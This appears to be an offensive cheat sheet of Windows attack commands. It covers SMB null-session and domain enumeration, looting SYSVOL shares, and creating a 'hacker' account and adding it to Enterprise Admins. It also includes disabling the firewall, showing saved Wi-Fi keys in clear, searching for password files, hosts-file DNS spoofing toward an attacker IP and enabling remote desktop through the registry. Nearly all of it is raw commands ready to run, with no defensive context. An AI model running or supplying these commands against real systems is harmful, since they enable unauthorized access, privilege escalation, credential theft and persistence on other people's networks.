Windows


# Anonymous users can obtain the Windows password policy

msfconsole
use auxiliary/scanner/smb/smb_enumusers 
------------------------------------------------------------------------------------------------------

# CIFS NULL Session Permitted

enum4linux -v <target IP>

rpclient -U "" <target IP>
Enter  's password: <return>
rpcclient $> srvinfo
rpcclient $> enumdomusers
rpcclient $> getdompwinfo

net use \\target IP\ipc$ "" /u:""     # Windows
------------------------------------------------------------------------------------------------------

# CIFS Share Writeable By Everyone

Places > Network > Browse Network

------------------------------------------------------------------------------------------------------

# Create an anonymous connection

smbclient -N -L <target IP>
smbclient -W Workgroup -U ‘hacker%password’ \\\\192.168.1.105\\SYSVOL
smb:\> recurse 
smb:\> prompt off 
smb:\> mget scripts
------------------------------------------------------------------------------------------------------

# NetBIOS and SMB

nmap -Pn -n -T4 -p139,445 --script=smb-check-vulns --script-args=unsafe=1 <range>

enum -G <target IP>
enum -P <target IP>

nbtenum -r <target IP>
nbtenum -q <target IP>

nbtscan -r <target range>
nbtscan -f hosts.txt
------------------------------------------------------------------------------------------------------

# Show domain users and group information

DumpSec
------------------------------------------------------------------------------------------------------

# Show members of domain groups

global.exe "domain admins" \\dc-controller
------------------------------------------------------------------------------------------------------

# Impersonate a Domain Admin to create Enterprise Admin credentials:

net user hacker password /add /domain
net group "Enterprise Admins" hacker /add /domain
net groups "Enterprise Admins" /domain

------------------------------------------------------------------------------------------------------

# Search all folders for filenames that include 'password'.

dir /s /p *password*.*
------------------------------------------------------------------------------------------------------

# net commands

net view                                    Computers in the users domain and other domains.
net view /domain                            Computers in other domain.
net user                                    Local users.
net user /domain > users.txt                All users in the current user's domain (take a few to run).
net localgroup                              Local Security Groups.
net localgroup /domain                      Domain Security Groups.
net localgroup Administrators               Users in the local Administrators Security Group.
net localgroup Administrators /domain       Users in the domain Administrators Security Group.
net user hacker /domain                     Info on domain user.
net accounts                                Local password policies.
net config workstation
net share

net user hacker password /add
net localgroup administrators /add hacker
------------------------------------------------------------------------------------------------------

# Domain accounts

net group “Domain Admins" /domain > domain-admin.txt
net group “Domain Users" /domain > domain-users.txt

net user hacker password /add /domain
net group "Enterprise Admins" hacker /add /domain
net groups "Enterprise Admins" /domain
------------------------------------------------------------------------------------------------------

# Enumeration
 
date /t & time /t
set
arp -a
ipconfig /all
ipconfig /displaydns
route print
net view
netstat -ano
netstat -c
netstat -vb
netstat -ns
netstat -ano | findstr LISTENING
net accounts
net accounts /domain
net session
net share
net group
net user
net localgroup
net localgroup administrators
net group administrators
net view /domain
tasklist /svc
tasklist /m
gpresult /COMPUTERNAME
gpresult /%username%
gpresult /z
net sessions
nbtstat -A <target IP>
nbtstat -a <name of target>
doskey /history
net start
tasklist /v
tasklist /m
dir c:\*.doc /s
dir c:\*.jpg /s
dir c:\*.pdf /s
dir c:\*.ppt /s
dir c:\*.url /s
dir c:\*.xls /s
------------------------------------------------------------------------------------------------------

# Firewall

netsh firewall show config
netsh firewall add portopening TCP 8081 ePO
netsh firewall set opmode disable                  Disable firewall.

firewall show state
netsh firewall set opmode disable

netsh wlan show interfaces
netsh wlan show drivers
netsh wlan show networks
netsh wlan show profiles
netsh wlan show profiles name="name"
show profiles name="name" key=clear
------------------------------------------------------------------------------------------------------

# Local DNS spoofing

echo <attacker IP> facebook >> %WINDIR%\System32\drivers\etc\hosts
type %WINDIR%\System32\drivers\etc\hosts
------------------------------------------------------------------------------------------------------

# Misc

cd \WINDOWS\system32\
type %SYSTEMDRIVE%\boot.ini
type %WINDIR%\win.ini
fsutil fsinfo drives

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

netsh rdesktop <target-IP>
